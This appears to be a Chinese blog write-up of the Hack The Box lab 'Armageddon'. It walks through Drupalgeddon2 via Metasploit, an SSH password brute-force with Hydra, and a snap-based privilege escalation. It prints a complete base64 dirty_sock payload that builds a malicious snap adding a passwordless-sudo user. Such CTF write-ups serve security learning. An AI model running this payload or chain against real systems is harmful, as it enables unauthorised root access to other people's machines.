Armageddon

最新推荐文章于 2022-11-27 20:08:00 发布
最新推荐文章于 2022-11-27 20:08:00 发布
阅读量311 收藏
点赞数 1
分类专栏: hack the box 文章标签: 渗透测试 hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/118425224
版权

主机信息

在这里插入图片描述
在这里插入图片描述

枚举主机服务

我们通过nmap扫描10.10.10.233主机发现它开放了ssh服务和web服务

nmap -sV -sC -sS 10.10.10.233

在这里插入图片描述
我们访问对应的web服务,可以看到使用的是Drupal7这个CMS框架
在这里插入图片描述
立马在MSF框架上搜索一下对应的利用脚本,不使用MSF框架也可以用github上的开源EXP
在这里插入图片描述
我们这里使用的是drupal_drupalgeddon2这个漏洞利用模块,设置好参数直接开打,获得一个shell
在这里插入图片描述
/etc/passwd这个目录下发现了brucetherealadmin这个账户。看这名字盲猜要进行暴力破解
在这里插入图片描述
我们使用九头蛇进行暴力猜解,使用的字典是rockyou.txt.gz,爆破出来的密文是booboo
在这里插入图片描述
爆破出密码,肯定ssh登录啦,使用sudo -l查看到无密码执行/usr/bin/snap install *
在这里插入图片描述
从上面可看出要利用snap这个服务进行提权,那我们就生成一个snap马进行利用就行了,查阅了下资料,这个网址上有一些资料可作参考https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html

python2 -c 'print"aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw"
+ "A" * 4256 + "=="'|base64 -d >exploit.snap

在这里插入图片描述
在这里插入图片描述
我们直接运行这个exploit.snap文件,发现运行失败了
在这里插入图片描述
但是我们加上--devmode这个参数之后,我们就运行正常了
在这里插入图片描述
我们查看一下/etc/passwd文件有没有将dirty_sock这个账户添加成功
在这里插入图片描述
我们尝试切换到这个用户上面去,并执行sudo -i提权成功
在这里插入图片描述

平凡的学者
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
armageddon-htb
04-01
armageddon-htb
ArmaGeddon(脱壳机)
08-04
好用!!!ArmaGeddon(脱壳机)ArmaGeddon(脱壳机)
Armadillo脱壳知识和方法大全
小H解密逆向
12-02 1203
Armadillo脱壳知识和方法大全 近日对Armadillo壳很感兴趣,缘于它的多种组合的变化,但仔细看来,其保护的解决方法又有相对固定。方法无外乎那么几种脱壳方法(当然排除有key和cc),本人在本论坛已对标准壳的脱壳方法发贴,但后来有所更新,干脆总结在一块吧,以方便大家。大家可以复制下来,放在手边,脱壳时按步骤来。我还是一小鸟,同大家一样在逐渐成长中,有不对的地方和不成熟的地方,望大家
Hack the Box Armageddon 靶机渗透
Shadow的博客
07-22 748
Five86-1 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-09 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 ———————————————— 版权声明:本文为CSDN博主「c2hhZG93」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/qq
HTB- Armageddon
qq_53142368的博客
07-22 1170
hack the box
HTB-Armageddon
TA不懒,但还没有添加简介
09-16 356
HTB-Armageddon
Spawn Armageddon
fifa14coinswsx的专栏
06-14 260
Spawn: Armageddon Grafik sind keineswegs schlecht, aber sie sind nicht wirklich viel zu sehen, auch nicht. Die offensichtliche herausragenden wäre hier der Charakter-Design, die voll von dem Horror-in
Hack The Box】Linux练习-- Armageddon
人间体佐菲的博客
11-27 251
Hack The Box】Linux练习-- Armageddon
HackTheBox - Armageddon
0pr
06-29 244
Overview Pretty simple box. Solution Recon Nmap FIrst nmap the target. Got port 22 and 80 open. Try SSH to the box. SSH banner reveals no useful information. Websiite Checkout the website. I tried to use single quote in the login form to test for sqli, bu
研读:ARMageddon: Cache Attacks on Mobile Devices
Trust Bo
11-30 1687
本PPT是对发表在USENIX Security 2016 上的一篇文章的研读和解析,该论文介绍了当前流行且有效的针对X86系统CPU Cache的侧信道攻击方法,攻克5大挑战后将攻击方法成功应用到ARM CPU上,实现了对移动智能手机用户输入行为的侦测,同时也实现了对AES T-table的攻击,并证明对TrustZone机制同样有效,本文攻击方法对当前在售的成百万计的移动智能机构成极大威胁,成果已提前告知Google,并完成了Android系统漏洞补丁的发布。
基于Springboot的甘肃非物质文化网站的+源代码+演示视频.zip
09-02
现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本甘肃非物质文化网站就是在这样的大环境下诞生,其可以帮助管理者在短时间内处理完毕庞大的数据信息,使用这种软件工具可以帮助管理人员提高事务处理效率,达到事半功倍的效果。此甘肃非物质文化网站利用当下成熟完善的SSM框架,使用跨平台的可开发大型商业网站的Java语言,以及最受欢迎的RDBMS应用软件之一的Mysql数据库进行程序开发.甘肃非物质文化网站的开发根据操作人员需要设计的界面简洁美观,在功能模块布局上跟同类型网站保持一致,程序在实现基本要求功能时,也为数据信息面临的安全问题提供了一些实用的解决方案。可以说该程序在帮助管理者高效率地处理工作事务的同时,也实现了数据信息的整体化,规范化与自动化。 关键词:甘肃非物质文化网站;SSM框架;Mysql;自动化
技术资料分享cadence技术资料(003).zip
09-02
技术资料分享cadence技术资料(003).zip
Av1an-1.7.0-py3-none-any.whl.zip
09-02
Av1an-1.7.0-py3-none-any.whl.zip
gergel_isopropyl_bromide.pdf
最新发布
09-02
gergel_isopropyl_bromide.pdf
Av1an-1.12.2-py3-none-any.whl.zip
09-02
Av1an-1.12.2-py3-none-any.whl.zip
电力及公用事业行业周报:2023年上半年储能装机规模快速增长,辅助服务市场规模扩容.pdf
09-02
电子元件 电子行业 行业分析 数据分析 数据报告 行业报告
大数据处理框架:Spark:Scala编程基础.docx
09-02
大数据处理框架:Spark:Scala编程基础.docx
2024科目四速记口诀.pdf
09-02
2024科目四速记口诀.pdf
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值